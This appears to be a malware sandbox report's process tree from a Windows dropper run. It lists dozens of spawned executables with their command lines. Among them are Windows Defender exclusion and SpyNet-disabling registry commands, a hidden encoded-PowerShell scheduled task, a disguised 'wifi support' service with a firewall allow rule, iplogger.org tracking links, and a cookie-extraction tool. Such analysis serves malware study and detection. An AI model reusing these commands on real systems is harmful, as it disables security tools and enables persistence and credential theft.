C:\Users\Admin\AppData\Local\Temp\G6B25.exe
"C:\Users\Admin\AppData\Local\Temp\G6B25.exe"
7⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\819MD.exe
"C:\Users\Admin\AppData\Local\Temp\819MD.exe"
7⤵
PID:2564

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\TEBW8SGT.CpL",
8⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\BDBKK1KE635C9E9.exe
https://iplogger.org/1ydBa7
7⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\BlackCleanerSetp23468.exe
"C:\Users\Admin\AppData\Local\Temp\BlackCleanerSetp23468.exe"
6⤵
PID:5200

C:\Users\Admin\AppData\Local\Temp\lijun.exe
"C:\Users\Admin\AppData\Local\Temp\lijun.exe"
6⤵
PID:3248

C:\Users\Admin\AppData\Local\Temp\lijun.exe
"C:\Users\Admin\AppData\Local\Temp\lijun.exe" -h
7⤵
PID:4276

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
6⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\tvstream1.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream1.exe"
6⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\is-P0V4F.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P0V4F.tmp\setup.tmp" /SL5="$3035C,2343741,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
8⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"
6⤵
PID:3712

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
6⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
6⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
6⤵
PID:4468

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5232

C:\Users\Admin\Pictures\Adobe Films\FTHQGIAO33QP2lIi2DUEwC1V.exe
"C:\Users\Admin\Pictures\Adobe Films\FTHQGIAO33QP2lIi2DUEwC1V.exe"
3⤵
- Executes dropped EXE
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 424
4⤵
PID:2140

C:\Users\Admin\Pictures\Adobe Films\PYoiTPg0OKLVGG0TBDTDgEig.exe
"C:\Users\Admin\Pictures\Adobe Films\PYoiTPg0OKLVGG0TBDTDgEig.exe"
3⤵
PID:4868

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
4⤵
PID:5188

C:\Users\Admin\Pictures\Adobe Films\0r9BWtY4OEsfmZoQDEKwGHro.exe
"C:\Users\Admin\Pictures\Adobe Films\0r9BWtY4OEsfmZoQDEKwGHro.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 624
4⤵
PID:5612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 632
4⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 652
4⤵
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 636
4⤵
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 1224
4⤵
PID:5564

C:\Users\Admin\Pictures\Adobe Films\HsPs0gIrdTB71ZVvAReV9Qj4.exe
"C:\Users\Admin\Pictures\Adobe Films\HsPs0gIrdTB71ZVvAReV9Qj4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2064

C:\Users\Admin\Pictures\Adobe Films\2Tv8_mPSi_59ygUFTQlgG9ca.exe
"C:\Users\Admin\Pictures\Adobe Films\2Tv8_mPSi_59ygUFTQlgG9ca.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3632

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
4⤵
PID:6036

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
5⤵
PID:5596

C:\Users\Admin\Pictures\Adobe Films\KEh1RyqscDu67xoB9Xw3KqU8.exe
"C:\Users\Admin\Pictures\Adobe Films\KEh1RyqscDu67xoB9Xw3KqU8.exe"
3⤵
- Executes dropped EXE
PID:1716

C:\Users\Admin\AppData\Local\Temp\NO9LVDdRNdUS6\Notes License Agreement.exe
"C:\Users\Admin\AppData\Local\Temp\NO9LVDdRNdUS6\Notes License Agreement.exe"
4⤵
PID:2024

C:\Users\Admin\Pictures\Adobe Films\jJWi1oVef02KJcAxTKFFGRoH.exe
"C:\Users\Admin\Pictures\Adobe Films\jJWi1oVef02KJcAxTKFFGRoH.exe"
3⤵
PID:4620

C:\Users\Admin\Pictures\Adobe Films\jJWi1oVef02KJcAxTKFFGRoH.exe
"C:\Users\Admin\Pictures\Adobe Films\jJWi1oVef02KJcAxTKFFGRoH.exe"
4⤵
PID:5552

C:\Users\Admin\Pictures\Adobe Films\CoN22g5qCOaZsNU3lpBT3F_I.exe
"C:\Users\Admin\Pictures\Adobe Films\CoN22g5qCOaZsNU3lpBT3F_I.exe"
3⤵
PID:4344

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
4⤵
PID:5248

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
4⤵
PID:5544

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6108

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:5908

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:5700

C:\Users\Admin\Pictures\Adobe Films\GQdc9giYs16OksO5kRO_JcGk.exe
"C:\Users\Admin\Pictures\Adobe Films\GQdc9giYs16OksO5kRO_JcGk.exe"
3⤵
PID:4200

C:\Users\Admin\Pictures\Adobe Films\GQdc9giYs16OksO5kRO_JcGk.exe
"C:\Users\Admin\Pictures\Adobe Films\GQdc9giYs16OksO5kRO_JcGk.exe"
4⤵
PID:5492

C:\Users\Admin\Pictures\Adobe Films\8EK7FKdakboGR_V9qfMySxjb.exe
"C:\Users\Admin\Pictures\Adobe Films\8EK7FKdakboGR_V9qfMySxjb.exe"
3⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 196
4⤵
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 212
4⤵
PID:5920

C:\Users\Admin\Pictures\Adobe Films\oN5377U4o_qR1x8UUdIPnw5F.exe
"C:\Users\Admin\Pictures\Adobe Films\oN5377U4o_qR1x8UUdIPnw5F.exe"
3⤵
PID:3944

C:\Users\Admin\Pictures\Adobe Films\BRJNek3Wa7H74HMlfmQbeYg3.exe
"C:\Users\Admin\Pictures\Adobe Films\BRJNek3Wa7H74HMlfmQbeYg3.exe"
3⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gxygiurv\
4⤵
PID:5800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rfgikpcf.exe" C:\Windows\SysWOW64\gxygiurv\
4⤵
PID:6020

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create gxygiurv binPath= "C:\Windows\SysWOW64\gxygiurv\rfgikpcf.exe /d\"C:\Users\Admin\Pictures\Adobe Films\BRJNek3Wa7H74HMlfmQbeYg3.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:948

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start gxygiurv
4⤵
PID:5016

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description gxygiurv "wifi internet conection"
4⤵
PID:5348

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:5600

C:\Users\Admin\ugpiyyct.exe
"C:\Users\Admin\ugpiyyct.exe" /d"C:\Users\Admin\Pictures\Adobe Films\BRJNek3Wa7H74HMlfmQbeYg3.exe"
4⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wrgcwywr.exe" C:\Windows\SysWOW64\gxygiurv\
5⤵
PID:2352

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config gxygiurv binPath= "C:\Windows\SysWOW64\gxygiurv\wrgcwywr.exe /d\"C:\Users\Admin\ugpiyyct.exe\""
5⤵
PID:2020

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start gxygiurv
5⤵
PID:864

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:5196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5002.bat" "
5⤵
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1264
5⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1052
4⤵
PID:5432

C:\Users\Admin\Pictures\Adobe Films\ntxZV53_LSGyhByYEJimDsiT.exe
"C:\Users\Admin\Pictures\Adobe Films\ntxZV53_LSGyhByYEJimDsiT.exe"
3⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\7zS4908.tmp\Install.exe
.\Install.exe
4⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\7zS95FF.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:1400

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:4432

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:5620

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:6008

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:4944

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:5684

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:5988

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:2608

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:3164

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "goCHXiyOK" /SC once /ST 04:39:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:3808

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "goCHXiyOK"
6⤵
PID:1404

C:\Users\Admin\Pictures\Adobe Films\ezlU11zhcqOZm3CRQhtssXtr.exe
"C:\Users\Admin\Pictures\Adobe Films\ezlU11zhcqOZm3CRQhtssXtr.exe"
3⤵
PID:2256

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5872

C:\Users\Admin\Pictures\Adobe Films\iYPv5T5tHF1ON8tinJZA5Un_.exe
"C:\Users\Admin\Pictures\Adobe Films\iYPv5T5tHF1ON8tinJZA5Un_.exe"
3⤵
PID:1132

C:\Users\Admin\Pictures\Adobe Films\wxdsEqKQWmDvPVQBJOqyBmhh.exe
"C:\Users\Admin\Pictures\Adobe Films\wxdsEqKQWmDvPVQBJOqyBmhh.exe"
3⤵
PID:2236

C:\Users\Admin\AppData\Local\Temp\tempcheckfile.exe
"C:\Users\Admin\AppData\Local\Temp\tempcheckfile.exe"
4⤵
PID:4460

C:\Users\Admin\Pictures\Adobe Films\28Hx3gGfJEzNB3JAqi1z4a4P.exe
"C:\Users\Admin\Pictures\Adobe Films\28Hx3gGfJEzNB3JAqi1z4a4P.exe"
3⤵
PID:4624

C:\Users\Admin\Pictures\Adobe Films\GdkLvoUYhNHp4IJM7GRROaw4.exe
"C:\Users\Admin\Pictures\Adobe Films\GdkLvoUYhNHp4IJM7GRROaw4.exe"
3⤵
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 464
4⤵
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 484
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4868

C:\Users\Admin\Pictures\Adobe Films\biNa6QTEp04RKPSgOeNzu9PT.exe
"C:\Users\Admin\Pictures\Adobe Films\biNa6QTEp04RKPSgOeNzu9PT.exe"
3⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\FG5A2.exe
"C:\Users\Admin\AppData\Local\Temp\FG5A2.exe"
4⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\IJ3L2.exe
"C:\Users\Admin\AppData\Local\Temp\IJ3L2.exe"
4⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\LGL9E.exe
"C:\Users\Admin\AppData\Local\Temp\LGL9E.exe"
4⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\710I0.exe
"C:\Users\Admin\AppData\Local\Temp\710I0.exe"
4⤵
PID:1304

C:\Users\Admin\AppData\Local\Temp\GB0BD28J32H0MD6.exe
https://iplogger.org/1OUvJ
4⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\MA3A2.exe
"C:\Users\Admin\AppData\Local\Temp\MA3A2.exe"
4⤵
PID:692

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\TEBW8SGT.CpL",
5⤵
PID:3992

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\TEBW8SGT.CpL",
6⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4152

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3884

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2428

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1852

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4528

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 604
3⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2236 -ip 2236
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4092 -ip 4092
1⤵
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4092 -ip 4092
1⤵
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4092 -ip 4092
1⤵
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4092 -ip 4092
1⤵
PID:1452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4092 -ip 4092
1⤵
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4092 -ip 4092
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4092 -ip 4092
1⤵
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4092 -ip 4092
1⤵
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4092 -ip 4092
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4092 -ip 4092
1⤵
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4092 -ip 4092
1⤵
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 4092 -ip 4092
1⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4092 -ip 4092
1⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4092 -ip 4092
1⤵
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4092 -ip 4092
1⤵
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4092 -ip 4092
1⤵
PID:1276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4092 -ip 4092
1⤵
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4092 -ip 4092
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4092 -ip 4092
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4092 -ip 4092
1⤵
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4092 -ip 4092
1⤵
PID:3140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4540 -ip 4540
1⤵
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4540 -ip 4540
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4540 -ip 4540
1⤵
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4540 -ip 4540
1⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4540 -ip 4540
1⤵
PID:968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4540 -ip 4540
1⤵
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4540 -ip 4540
1⤵
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4540 -ip 4540
1⤵
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4540 -ip 4540
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4540 -ip 4540
1⤵
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4540 -ip 4540
1⤵
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4540 -ip 4540
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4540 -ip 4540
1⤵
PID:864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4540 -ip 4540
1⤵
PID:2352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4540 -ip 4540
1⤵
PID:2104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4540 -ip 4540
1⤵
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4540 -ip 4540
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4916 -ip 4916
1⤵
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4916 -ip 4916
1⤵
PID:3944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4916 -ip 4916
1⤵
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4916 -ip 4916
1⤵
PID:964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4916 -ip 4916
1⤵
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4916 -ip 4916
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4916 -ip 4916
1⤵
PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4916 -ip 4916
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4916 -ip 4916
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4916 -ip 4916
1⤵
PID:2640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4916 -ip 4916
1⤵
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4916 -ip 4916
1⤵
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4916 -ip 4916
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4916 -ip 4916
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4916 -ip 4916
1⤵
PID:3156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4916 -ip 4916
1⤵
PID:2272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4916 -ip 4916
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4916 -ip 4916
1⤵
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4916 -ip 4916
1⤵
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4916 -ip 4916
1⤵
PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4916 -ip 4916
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4916 -ip 4916
1⤵
PID:3392

